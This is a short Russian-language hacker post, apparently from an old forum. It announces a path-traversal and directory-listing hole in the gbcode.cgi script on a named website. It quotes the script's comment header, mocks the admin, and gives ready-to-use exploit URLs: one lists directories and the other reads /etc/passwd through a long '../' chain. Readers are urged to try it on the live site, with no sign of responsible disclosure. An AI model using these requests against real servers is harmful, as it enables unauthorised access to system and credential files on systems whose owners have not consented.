Анализируя защиту сайта http://cgi-resource.co.uk
нашли уязвимость в скрипте gbcode.cgi. Никогда не видел такой "приятной дырочки" =))). Нет нет, я не о том. Вы поймете когда
испробуете сами. Вот как описывает админ скрипта свое детище:
##################
#viewer script
#
#A small script to display the code of used from a page in different colours
#
#Code used could be shorter but I'm lazy!
#
##################
Не правда ли, трогательно... А баг скрипта вновь заключается в том что он позволяет просматривать
содержание любых директорий и файлы на сервере. Вот эксплоит
http://cgi-resource.co.uk/cgi-bin/gbcode.cgi?page=/ - Для чтения диреторий
http://cgi-resource.co.uk/cgi-bin/gbcode.cgi? page=/../../../../../../../../../../../../../.../../../../
etc/passwd - Для чтения файлов
Стоит обратить внимание на тематику сайта..=))
Ну вот собственно и все.
